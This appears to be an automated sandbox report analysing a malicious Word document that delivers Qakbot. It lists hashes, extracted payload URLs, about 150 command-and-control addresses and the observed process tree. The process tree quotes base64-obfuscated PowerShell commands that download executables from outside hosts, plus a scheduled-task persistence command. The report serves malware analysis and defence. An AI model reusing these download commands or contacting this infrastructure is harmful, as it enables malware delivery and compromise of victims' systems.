Analysis
-
max time kernel
136s -
max time network
33s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09-06-2020 11:55
Static task
static1
Behavioral task
behavioral1
Sample
AGRMT_06052020_195.doc
Resource
win7v200430
General
-
Target
AGRMT_06052020_195.doc
-
Size
220KB
-
MD5
bc8cf7a3c840dc88cfa89f69852e46e6
-
SHA1
1528a5750c9072ebbc963687079c010b18240c9e
-
SHA256
e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc
-
SHA512
c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317
Malware Config
Extracted
http://salwadm.com/tcphx/8888888.png
Extracted
http://flipkenya.com/nujazbwrhjy/8888888.png
Extracted
qakbot
spx135
1591627649
89.32.216.156:443
74.222.204.82:443
24.183.39.93:443
97.93.211.17:443
80.14.209.42:2222
96.35.170.82:2222
151.73.124.242:443
98.110.231.63:443
108.227.161.27:995
173.3.132.17:995
31.5.41.52:443
24.122.228.88:443
5.107.208.94:2222
76.185.136.58:443
50.29.166.232:995
73.210.114.187:443
92.114.107.193:995
24.43.22.220:993
50.247.230.33:995
72.142.106.198:465
102.41.122.185:995
67.131.59.17:443
184.98.104.7:995
69.11.247.242:443
201.127.4.70:443
72.204.242.138:50003
189.231.198.212:443
5.14.44.173:2222
5.14.76.156:443
151.205.102.42:443
179.51.23.31:443
72.190.101.70:443
73.76.47.127:443
80.240.26.178:443
72.36.59.46:2222
73.209.113.58:443
68.49.120.179:443
69.92.54.95:995
187.19.151.218:995
50.244.112.10:443
66.222.88.126:995
207.255.161.8:32102
108.58.9.238:995
105.98.154.57:443
98.219.77.197:443
216.163.4.91:443
47.152.210.233:443
178.223.17.74:995
72.204.242.138:20
82.127.193.151:2222
50.91.171.137:443
172.242.80.243:443
189.163.110.244:443
108.30.125.94:443
104.50.141.139:995
73.94.229.115:443
67.83.54.76:2222
72.29.181.77:2078
188.24.102.178:443
66.68.22.151:443
24.122.157.93:443
72.204.242.138:53
172.87.134.226:443
118.160.164.140:443
173.49.122.160:995
71.187.170.235:443
134.0.196.46:995
75.81.25.223:443
92.17.167.87:2222
185.246.9.69:995
70.123.92.175:2222
82.37.242.8:443
108.51.73.186:443
137.99.222.152:443
100.38.164.182:443
75.137.239.211:443
24.43.22.220:995
24.99.180.247:443
96.56.237.174:993
72.204.242.138:80
79.114.196.97:443
72.204.242.138:443
72.240.245.253:443
24.202.42.48:2222
46.102.60.186:443
200.113.201.83:993
98.27.176.35:443
47.201.1.210:443
50.78.93.74:443
68.60.221.169:465
66.26.160.37:443
190.198.124.212:2078
65.131.83.170:995
50.244.112.106:443
72.204.242.138:32102
77.159.149.74:443
184.96.155.4:993
72.16.212.108:465
47.153.115.154:995
72.240.200.181:2222
24.46.40.189:2222
68.82.125.234:443
188.173.70.18:443
47.40.244.237:443
5.13.105.2:443
76.30.66.244:443
5.14.188.235:443
72.204.242.138:995
5.69.56.255:443
5.14.248.119:443
188.192.75.8:443
24.27.82.216:2222
98.118.156.172:443
189.236.218.181:443
72.204.242.138:2078
47.41.3.40:443
108.28.90.129:443
184.89.71.68:443
31.50.210.205:2222
95.76.27.89:443
207.255.161.8:443
149.71.50.158:443
98.222.23.221:443
96.56.237.174:32103
68.116.193.239:443
100.38.123.22:443
47.24.47.218:443
24.110.96.149:443
181.91.254.1:443
96.18.240.158:443
67.165.206.193:995
69.28.222.54:443
98.243.187.85:443
184.180.157.203:2222
47.136.224.60:443
73.90.4.146:443
207.255.161.8:2222
203.33.139.134:443
104.221.4.11:2222
72.228.3.116:443
72.209.191.27:443
97.127.136.28:0
108.45.29.12:443
2.89.100.34:443
64.19.74.29:995
208.82.44.203:443
199.247.16.80:443
199.247.22.145:443
89.43.108.19:443
71.182.142.63:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1312 WINWORD.EXE -
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1064 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1496 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1688 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1844 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 368 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1608 1312 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1956 1312 cmd.exe WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exefile2.exefile2.execwvvo.execwvvo.exeexplorer.exepid process 1804 powershell.exe 1804 powershell.exe 928 powershell.exe 928 powershell.exe 748 file2.exe 1532 file2.exe 1532 file2.exe 1812 cwvvo.exe 1768 cwvvo.exe 1768 cwvvo.exe 1740 explorer.exe 1740 explorer.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 1312 WINWORD.EXE 1312 WINWORD.EXE -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 1804 powershell.exe 8 928 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
file2.exepid process 748 file2.exe -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
WINWORD.EXEcmd.exefile2.execwvvo.exedescription pid process target process PID 1312 wrote to memory of 1064 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1064 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1064 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1496 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1496 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1496 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1688 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1688 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1688 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 368 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 368 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 368 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1608 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1608 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1608 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1956 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1956 1312 WINWORD.EXE cmd.exe PID 1312 wrote to memory of 1956 1312 WINWORD.EXE cmd.exe PID 1956 wrote to memory of 748 1956 cmd.exe file2.exe PID 748 wrote to memory of 1532 748 file2.exe file2.exe PID 748 wrote to memory of 1532 748 file2.exe file2.exe PID 748 wrote to memory of 1532 748 file2.exe file2.exe PID 748 wrote to memory of 1532 748 file2.exe file2.exe PID 748 wrote to memory of 1812 748 file2.exe cwvvo.exe PID 748 wrote to memory of 1812 748 file2.exe cwvvo.exe PID 748 wrote to memory of 1812 748 file2.exe cwvvo.exe PID 748 wrote to memory of 1812 748 file2.exe cwvvo.exe PID 748 wrote to memory of 1380 748 file2.exe schtasks.exe PID 748 wrote to memory of 1380 748 file2.exe schtasks.exe PID 748 wrote to memory of 1380 748 file2.exe schtasks.exe PID 748 wrote to memory of 1380 748 file2.exe schtasks.exe PID 1812 wrote to memory of 1768 1812 cwvvo.exe cwvvo.exe PID 1812 wrote to memory of 1768 1812 cwvvo.exe cwvvo.exe PID 1812 wrote to memory of 1768 1812 cwvvo.exe cwvvo.exe PID 1812 wrote to memory of 1768 1812 cwvvo.exe cwvvo.exe PID 1812 wrote to memory of 1740 1812 cwvvo.exe explorer.exe PID 1812 wrote to memory of 1740 1812 cwvvo.exe explorer.exe PID 1812 wrote to memory of 1740 1812 cwvvo.exe explorer.exe PID 1812 wrote to memory of 1740 1812 cwvvo.exe explorer.exe PID 1812 wrote to memory of 1740 1812 cwvvo.exe explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
cwvvo.exepid process 1812 cwvvo.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEpid process 1312 WINWORD.EXE 1312 WINWORD.EXE 1312 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 928 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
file2.exefile2.execwvvo.execwvvo.exepid process 748 file2.exe 1532 file2.exe 1812 cwvvo.exe 1768 cwvvo.exe -
Loads dropped DLL 2 IoCs
Processes:
file2.exepid process 748 file2.exe 748 file2.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Modifies registry class
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')3⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 653⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')3⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 653⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Public\tmpdir\tmps2.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 23⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 24⤵
-
C:\Users\Public\tmpdir\file2.exeC:\Users\Public\tmpdir\file2.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Public\tmpdir\file2.exeC:\Users\Public\tmpdir\file2.exe /C4⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exeC:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exeC:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe /C5⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn fcyfsnhihx /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I fcyfsnhihx" /SC ONCE /Z /ST 14:09 /ET 14:214⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.dat
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
C:\Users\Public\1.txt
-
C:\Users\Public\2.txt
-
C:\Users\Public\tmp.bat
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\tmps2.bat
-
\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
memory/1312-2-0x00000000089D0000-0x00000000089D4000-memory.dmpFilesize
16KB
-
memory/1532-19-0x00000000022C0000-0x00000000022D1000-memory.dmpFilesize
68KB
-
memory/1768-25-0x0000000002370000-0x0000000002381000-memory.dmpFilesize
68KB
-
memory/1812-26-0x0000000000370000-0x00000000003AA000-memory.dmpFilesize
232KB